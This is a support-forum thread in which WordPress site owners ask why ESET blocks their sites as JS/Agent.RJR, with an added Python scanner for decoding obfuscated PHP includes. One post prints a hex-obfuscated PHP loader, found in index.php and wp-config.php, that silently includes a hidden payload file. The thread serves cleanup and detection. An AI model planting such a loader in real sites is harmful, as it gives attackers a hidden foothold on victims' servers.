kichus (Posted January 27)
The following WordPress website https://infinitumpartners.com.au/ is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed. None of the internal scans are showing any malicious code present. Could you please help us to locate the actual issue? It is critical as our business is affected. Thank you so much in advance.

Marcos (Administrators, Posted January 27)
The website was compromised and contains the JS malware detected by ESET: https://sitecheck.sucuri.net/results/https/infinitumpartners.com.au

kichus (Author, Posted January 27)
Thank you so much for your quick reply. We have seen this report already but are not seeing any traces of this code in the source code nor in the DB. Could you please help us locate the code, and is it location-specific? Thank you in advance.

Marcos (Administrators, Posted January 27)
Unfortunately we can't tell. We don't provide website cleaning and monitoring services nor have access to your web server and database. We merely scan the HTML code downloaded from the Internet.

kichus (Author, Posted January 27)
Thank you. Appreciate your time.

itman (Posted January 27)
40 minutes ago, Glassertje said:
> The website is working here. No warning.
Same here using Firefox. However, Sucuri detects web site injection. It could be that Eset Secure Browser mode for EIS and ESSP is blocking the code injection. It also appears to be an infected WordPress plug-in, http://infinitumpartners.com.au/wp-content/uploads/2021/11/OTP2-Dark-overlay-60.jpg?id=3552

Marcos (Administrators, Posted January 27)
No detection now either. I recollect that the Sucuri scanner caches results for some time, i.e. it's still showing the malicious code even if it has been removed today.

MicroS (Posted January 29)
Hi. On my website https://pgmprzemysl.pl ESET detects JS/Agent.RJR. I scanned the website on VirusTotal (https://www.virustotal.com/gui/url/a62fdc26b3fcd54a45a5d1a3e431f154fade046c29fdc57a70438839ec9f92d4) but the scanner shows that everything is clean. I found something like

    $r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss";
    strpos($r9, 't5y');
    @include_once /* p2bc */ ($r9);

in the index.php and wp-config.php files and I removed this, but JS/Agent.RJR is still detected somewhere. What else should I check?

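Added example, not part of the original post or of ESET's or Sucuri's tooling: a small scanner that decodes the `\xNN` escapes in a loader like the one quoted above and reports the file it actually includes. The function names and the heuristic (a hex-escaped path string in a file that also includes a variable, pointing at a dot-file or a non-.php target) are assumptions generalized from that one snippet.

```python
import re
from pathlib import Path

# PHP double-quoted string literal containing at least one \xNN escape.
HEX_STRING = re.compile(
    r'"((?:[^"\\]|\\.)*\\x[0-9a-fA-F]{2}(?:[^"\\]|\\.)*)"')
# include/require of a variable, tolerating inline /* ... */ comments.
VAR_INCLUDE = re.compile(
    r'\b(?:include|require)(?:_once)?\b\s*(?:/\*.*?\*/\s*)*\(?\s*\$\w+', re.S)

def decode_php_hex(s):
    """Decode \\xNN escapes as PHP does inside double quotes."""
    return re.sub(r'\\x([0-9a-fA-F]{2})',
                  lambda m: chr(int(m.group(1), 16)), s)

def suspicious_includes(php_source):
    """Return decoded include targets that look like hidden payload files."""
    if not VAR_INCLUDE.search(php_source):
        return []  # no include of a variable: nothing to resolve
    findings = []
    for m in HEX_STRING.finditer(php_source):
        path = decode_php_hex(m.group(1))
        name = path.rsplit("/", 1)[-1]
        # Assumed heuristic: a path whose file is hidden or is not .php.
        if "/" in path and (name.startswith(".") or not name.endswith(".php")):
            findings.append(path)
    return findings

def scan_tree(root):
    """Scan every .php file under a document root; return (file, target)."""
    hits = []
    for f in Path(root).rglob("*.php"):
        text = f.read_text(errors="replace")
        hits += [(str(f), target) for target in suspicious_includes(text)]
    return hits

# Sample input: the snippet quoted in the post above.
SAMPLE = r'''<?php
$r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss";
strpos($r9, 't5y');
@include_once /* p2bc */ ($r9);
'''

if __name__ == "__main__":
    for target in suspicious_includes(SAMPLE):
        print("hidden include target:", target)
```

Removing the loader lines from index.php and wp-config.php leaves the decoded target file in place, so the path this reports is the next thing to inspect on the server.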
Marcos (Administrators, Posted January 29)
2 hours ago, MicroS said:
> What else should I check?
Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl.

itman (Posted January 29)
24 minutes ago, Marcos said:
> Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl.
Sucuri is detecting Magento malware; namely malware.magento_shoplift.38.1. Refer to this article: https://labs.sucuri.net/signatures/sitecheck/malware-magento_shoplift-38-1/ .

kandrea (Posted January 30)
Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block the website but Sucuri still writes this: Warning: Malware Detected. Infected with malware. Immediate action is required. What could we do?

Marcos (Administrators, Posted January 30)
8 minutes ago, kandrea said:
> Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block the website but Sucuri still writes this: Warning: Malware Detected. Infected with malware. Immediate action is required.
The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com

itman (Posted January 30)
1 hour ago, Marcos said:
> The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com
Looks like the web site is no longer infected. Neither Sucuri nor Eset detects any malware.

Raxel (Posted January 31)
Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat?

Marcos (Administrators, Posted January 31)
5 hours ago, Raxel said:
> Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat?
The website is indeed infected:

Raxel (Posted January 31)
7 hours ago, Marcos said:
> The website is indeed infected:
Thank you! That could be a bad one, for sure.

AmadeusConcept (Posted February 8)
Hello, the following WordPress website https://le-blog-des-leaders.com is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in WordPress. None of the internal scans are showing any malicious code present. Could you please help us to locate the actual issue? It is critical as our business is affected. Thank you so much in advance.

Marcos (Administrators, Posted February 8)
12 minutes ago, AmadeusConcept said:
> is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in WordPress.
The website is indeed infected: https://sitecheck.sucuri.net/results/https/le-blog-des-leaders.com

Bruno777 (Posted February 9)
We have the same problem on our website: https://aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked for ESET users.

Marcos (Administrators, Posted February 10)
8 hours ago, Bruno777 said:
> We have the same problem on our website: https://aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked for ESET users.
The website is indeed infected: